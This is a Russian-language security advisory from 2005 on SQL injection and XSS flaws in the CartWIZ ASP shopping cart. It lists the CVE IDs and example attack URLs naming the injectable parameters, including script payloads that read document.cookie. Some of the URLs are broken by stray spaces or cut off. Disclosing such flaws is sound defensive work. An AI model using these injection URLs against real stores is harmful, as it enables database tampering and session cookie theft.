SQL-инъекция и межсайтовый скриптинг в CartWIZ

Дата публикации:
27.04.2005
Всего просмотров:
1167
Опасность:
Средняя
Наличие исправления:
Частично
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-1291
CVE-2005-1292
CVE-2005-2386
CVE-2005-2427
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие системных данных
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CartWIZ
Уязвимые версии: CartWIZ

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных уязвимого приложения.

1. SQL-инъекция возможна из-за недостаточной обработки входных данных в нескольких сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://[target]/cartWiz/store/addToCart.asp?
idProduct='SQL_INJECTION &quantity=1

http://[target]/cartwiz/store/productDetails.asp?
idProduct='SQL%20INJECTION

http://[target]/cartwiz/store/searchResults.asp?
name=&idCategory=&sku=&price From=0&
priceTo='SQL INJECTION&validate=1

http://[target]/cartwiz/store/searchResults.asp?
name=&idCategory=&sku=&priceFrom='
SQL INJECTION&priceTo=9999999999&validate=1

http://[target]/cartwiz/store/searchResults.asp?
name=&idCategory='SQL INJECTION&sku
=&priceFrom=0&priceTo=9999999999&validate=1

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/cartwiz/store/tellAFriend.asp?
idProduct='"><script>aler t(document.cookie)</script>

http://[target]/cartwiz/store/addToWishlist.asp?
idProduct='"><script>alert(document.cookie)</script>

http://[target]/cartwiz/store/acces s.asp?redirect='">
< script>alert(document.cookie)</script>

http://[target]/cartWiz/store/error.asp?message='">
< script>alert(document.cookie)</script>

http://[target] /cartwiz/store/login.asp?message=
Please+login+using+the+form+above+to+access
+your+account.&redirect='"><script>alert(docum

http://[target]/cartwiz/store/login.asp?mess age='">
< script>alert(document.cookie)</script>&redirect=

http://[target]/cartwiz/store/searchResults.asp?name=
& idCategory=&sku='%22%3E%3Cscript%3Ealert
(document.cookie )%3C/script%3E&priceFrom=0&pr

http://[target]/cartwiz/store/searchResults.asp?name='">
< script>alert(document.cookie)</script>&idCategory
=&sku=&priceFrom=

URL производителя: www.cartwiz.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Multiple Sql injection and XSS in CartWIZ ASP Cart

или введите имя

CAPTCHA